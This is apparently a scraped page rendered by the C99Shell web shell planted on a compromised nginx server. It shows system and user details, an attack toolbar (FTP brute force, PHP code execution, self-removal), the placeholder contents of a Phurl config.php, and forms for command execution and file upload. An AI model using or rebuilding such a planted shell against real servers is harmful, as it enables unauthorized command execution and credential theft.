!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phurl/configuracion/   drwxrwxr-x
Free 83.34 GB of 96.73 GB (86.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (1.14 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//The MySQL server you want phurl to connect to. High chance you won't need to change this, if you have a decent hosting package or server.
define('DB_HOSTNAME''localhost');
//Your MySQL username
define('DB_USERNAME''CHANGEME');
//Your MySQL password
define('DB_PASSWORD''CHANGEME');
//Name of the database you want phurl to use
define('DB_NAME''CHANGEME');
//No need to worry about the next two. If you don't know what they're for, you likely don't need them.
define('DB_VERSION''4');
define('DB_PREFIX''phurl_');
//The URL of your new URL shortener. Make sure it doesn't have a slash at the end!
define('SITE_URL''http://CHANGEME');
//A nice name for your URL shortener. 
define('SITE_TITLE''CHANGEME');
//The credentials you want to log into the admin panel with
define('ADMIN_USERNAME''admin');
define('ADMIN_PASSWORD''CHANGEME');

/*
 * Do not touch this part. It is vital for correct operation of Phurl.
 */
define('URL_PROTOCOLS''http|https|ftp|ftps|mailto|news|mms|rtmp|rtmpt|e2dk');
define('PHURL_VERSION''2');
define('PHURL_NUMERICVERSION''999999');
error_reporting(E_ALL);
$_ERROR = array();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0047 ]--